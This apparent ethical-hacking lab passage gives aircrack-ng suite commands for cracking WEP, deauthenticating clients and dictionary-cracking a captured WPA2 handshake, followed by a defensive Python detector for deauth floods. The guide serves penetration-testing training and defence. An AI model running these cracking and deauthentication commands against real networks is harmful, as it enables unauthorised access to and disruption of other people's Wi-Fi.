3. Perform Wireless Attacks

As an ethical hacker and pen tester of an organization, you must test its wireless security, exploit WPA2 flaws, and crack the network’s access point keys.


1. Crack WEP using Aircrack-ng

airmon-ng start wlan0
airodump-ng mon0
airodump-ng -w "filename" -c "channel number" mon0
aireplay-ng -1 0 -a (bssid) -h (mac of your card) -e (essid) (interface)
aireplay-ng -3 -b "bssid" -h "mac address" (interface)
aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0
aircrack-ng -b "bssid" "filename.cap"

2. Crack WEP using WifiPhisher

3. Crack WPA with FERN cracker

4. Crack WPA 2 with Aircrack

WPA2 is an upgrade to WPA; it includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP), an AES-based encryption protocol with strong security. WPA2 has two modes of operation: WPA2-Personal and WPA2-Enterprise. Despite being stronger than both WEP and WPA, the WPA2 encryption method can also be cracked using various techniques and tools.

In this task, we will use the Aircrack-ng suite to crack a WPA2 network.

aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap'

  • -a selects the attack mode used to crack the handshake; 2 = WPA/WPA2-PSK.

  • -b refers to the BSSID; replace it with the BSSID of the target router.

  • -w stands for wordlist; provide the path to a wordlist.

The result appears, showing the WPA handshake packet that airodump-ng captured. When the dictionary attack succeeds, the target access point's passphrase is displayed in plain text next to the message KEY FOUND!, as shown in the screenshot.
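Both procedures above depend on the aireplay-ng --deauth step, which forces a client to reconnect so the handshake can be captured. The following added example, not part of the original tutorial, shows the defender's view of that step: a small detector over monitor-mode 802.11 frames that flags any BSSID emitting a burst of deauthentication frames. The frame builder, MAC addresses, timestamps and the sample capture are all constructed for this example.

```python
from collections import defaultdict
DEAUTH_FC0 = 0xC0  # frame control byte 0: type 0 (management), subtype 12 (deauth)
BEACON_FC0 = 0x80  # type 0, subtype 8 (beacon); benign traffic in the sample

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def build_frame(fc0, dst, src, bssid, body=b""):
    """Constructed monitor-mode frame: FC, duration, addr1-3, seq ctrl, body."""
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (dst, src, bssid))
    return bytes([fc0, 0]) + b"\x00\x00" + addrs + b"\x00\x00" + body

def parse_deauth(frame: bytes):
    """(src, dst, bssid, reason) for a deauth frame, else None; addr1 = receiver,
    addr2 = transmitter (spoofed as the AP in a flood), addr3 = BSSID."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC0:
        return None
    return (mac_str(frame[10:16]), mac_str(frame[4:10]), mac_str(frame[16:22]),
            int.from_bytes(frame[24:26], "little"))  # reason code follows 24-byte header

def detect_deauth_burst(capture, window=2.0, threshold=3):
    """capture = [(timestamp, raw_frame)]. Returns {bssid: peak number of deauths
    seen in any `window`-second span} for every BSSID that reaches `threshold`."""
    times = defaultdict(list)
    for ts, raw in capture:
        parsed = parse_deauth(raw)
        if parsed is not None:
            times[parsed[2]].append(ts)
    alerts = {}
    for bssid, ts_list in times.items():
        ts_list.sort()
        start = 0
        for end, t in enumerate(ts_list):
            while t - ts_list[start] > window:  # drop frames older than the window
                start += 1
            if end - start + 1 >= threshold:
                alerts[bssid] = max(end - start + 1, alerts.get(bssid, 0))
    return alerts

AP, BCAST, OTHER_AP = "00:11:22:33:44:55", "ff:ff:ff:ff:ff:ff", "66:77:88:99:aa:bb"
REASON_7 = (7).to_bytes(2, "little")  # reason 7: class 3 frame from non-associated STA
SAMPLE_CAPTURE = [  # constructed: 4-frame flood claiming to be AP, one lone deauth from OTHER_AP
    (0.00, build_frame(BEACON_FC0, BCAST, AP, AP)),
    (0.10, build_frame(DEAUTH_FC0, BCAST, AP, AP, REASON_7)),
    (0.15, build_frame(DEAUTH_FC0, BCAST, AP, AP, REASON_7)),
    (0.20, build_frame(DEAUTH_FC0, BCAST, AP, AP, REASON_7)),
    (0.25, build_frame(DEAUTH_FC0, BCAST, AP, AP, REASON_7)),
    (5.00, build_frame(DEAUTH_FC0, "aa:bb:cc:dd:ee:01", OTHER_AP, OTHER_AP, REASON_7)),
]
```

A single deauth from a BSSID is normal (clients roam, APs time out idle stations); the burst threshold is what separates a forced-reconnect flood from routine management traffic.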


You can also use other tools such as hashcat (https://hashcat.net), Portable Penetrator (https://www.secpoint.com), WepCrackGui (https://sourceforge.net) to crack WEP/WPA/WPA2 encryption.

5. Create a Rogue Access Point
